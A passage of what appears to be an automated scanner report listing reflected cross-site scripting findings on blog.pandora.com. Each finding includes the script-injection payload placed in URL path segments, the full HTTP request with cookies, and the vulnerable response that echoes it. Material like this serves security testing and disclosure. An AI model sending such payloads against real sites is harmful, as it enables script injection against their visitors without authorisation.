Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesa9e9a<script>alert(1)</script>743af107344/2007/11/ was not found on this server.</p>
...[SNIP]...

3.131. http://blog.pandora.com/pandora/archives/2007/11/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/11/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 76aa1<script>alert(1)</script>70d85d884f6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200776aa1<script>alert(1)</script>70d85d884f6/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200776aa1<script>alert(1)</script>70d85d884f6/11/ was not found on this server.</p>
...[SNIP]...

3.132. http://blog.pandora.com/pandora/archives/2007/11/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/11/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload be509<script>alert(1)</script>31065c5cb7d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/11be509<script>alert(1)</script>31065c5cb7d/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:02 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/11be509<script>alert(1)</script>31065c5cb7d/ was not found on this server.</p>
...[SNIP]...

3.133. http://blog.pandora.com/pandora/archives/2007/12/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/12/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 22432<script>alert(1)</script>251e4966396 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora22432<script>alert(1)</script>251e4966396/archives/2007/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:49 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora22432<script>alert(1)</script>251e4966396/archives/2007/12/ was not found on this server.</p>
...[SNIP]...

3.134. http://blog.pandora.com/pandora/archives/2007/12/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/12/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6520c<script>alert(1)</script>295fc6b8631 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives6520c<script>alert(1)</script>295fc6b8631/2007/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives6520c<script>alert(1)</script>295fc6b8631/2007/12/ was not found on this server.</p>
...[SNIP]...

3.135. http://blog.pandora.com/pandora/archives/2007/12/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/12/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a6d8f<script>alert(1)</script>3888aff47e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007a6d8f<script>alert(1)</script>3888aff47e/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:54 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007a6d8f<script>alert(1)</script>3888aff47e/12/ was not found on this server.</p>
...[SNIP]...

3.136. http://blog.pandora.com/pandora/archives/2007/12/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/12/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3bf47<script>alert(1)</script>c247d05fe1f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/123bf47<script>alert(1)</script>c247d05fe1f/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/123bf47<script>alert(1)</script>c247d05fe1f/ was not found on this server.</p>
...[SNIP]...

3.137. http://blog.pandora.com/pandora/archives/2008/01/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/01/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9839c<script>alert(1)</script>cc1f4677e63 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora9839c<script>alert(1)</script>cc1f4677e63/archives/2008/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:50 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora9839c<script>alert(1)</script>cc1f4677e63/archives/2008/01/ was not found on this server.</p>
...[SNIP]...

3.138. http://blog.pandora.com/pandora/archives/2008/01/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/01/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c4d9b<script>alert(1)</script>1d7f2c0691b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesc4d9b<script>alert(1)</script>1d7f2c0691b/2008/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesc4d9b<script>alert(1)</script>1d7f2c0691b/2008/01/ was not found on this server.</p>
...[SNIP]...

3.139. http://blog.pandora.com/pandora/archives/2008/01/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/01/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 59e99<script>alert(1)</script>825e8cfc0de was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200859e99<script>alert(1)</script>825e8cfc0de/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:54 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200859e99<script>alert(1)</script>825e8cfc0de/01/ was not found on this server.</p>
...[SNIP]...

3.140. http://blog.pandora.com/pandora/archives/2008/01/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/01/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fe2be<script>alert(1)</script>1f3f48cf5b1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/01fe2be<script>alert(1)</script>1f3f48cf5b1/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/01fe2be<script>alert(1)</script>1f3f48cf5b1/ was not found on this server.</p>
...[SNIP]...

3.141. http://blog.pandora.com/pandora/archives/2008/02/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/02/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ac1f<script>alert(1)</script>ef5a796adc4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora2ac1f<script>alert(1)</script>ef5a796adc4/archives/2008/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:48 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora2ac1f<script>alert(1)</script>ef5a796adc4/archives/2008/02/ was not found on this server.</p>
...[SNIP]...

3.142. http://blog.pandora.com/pandora/archives/2008/02/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/02/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 34032<script>alert(1)</script>06892156e4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives34032<script>alert(1)</script>06892156e4e/2008/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:51 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives34032<script>alert(1)</script>06892156e4e/2008/02/ was not found on this server.</p>
...[SNIP]...

3.143. http://blog.pandora.com/pandora/archives/2008/02/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/02/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6411d<script>alert(1)</script>c8b26e3f983 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20086411d<script>alert(1)</script>c8b26e3f983/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:53 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20086411d<script>alert(1)</script>c8b26e3f983/02/ was not found on this server.</p>
...[SNIP]...

3.144. http://blog.pandora.com/pandora/archives/2008/02/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/02/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e1573<script>alert(1)</script>3b6a99d2827 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/02e1573<script>alert(1)</script>3b6a99d2827/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/02e1573<script>alert(1)</script>3b6a99d2827/ was not found on this server.</p>
...[SNIP]...

3.145. http://blog.pandora.com/pandora/archives/2008/03/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/03/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 172d5<script>alert(1)</script>d6b14e8dbb2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora172d5<script>alert(1)</script>d6b14e8dbb2/archives/2008/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:47 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora172d5<script>alert(1)</script>d6b14e8dbb2/archives/2008/03/ was not found on this server.</p>
...[SNIP]...

3.146. http://blog.pandora.com/pandora/archives/2008/03/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/03/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5ee2e<script>alert(1)</script>224981c07fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives5ee2e<script>alert(1)</script>224981c07fd/2008/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:49 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives5ee2e<script>alert(1)</script>224981c07fd/2008/03/ was not found on this server.</p>
...[SNIP]...

3.147. http://blog.pandora.com/pandora/archives/2008/03/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/03/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5184f<script>alert(1)</script>5f6e8db7f13 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20085184f<script>alert(1)</script>5f6e8db7f13/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
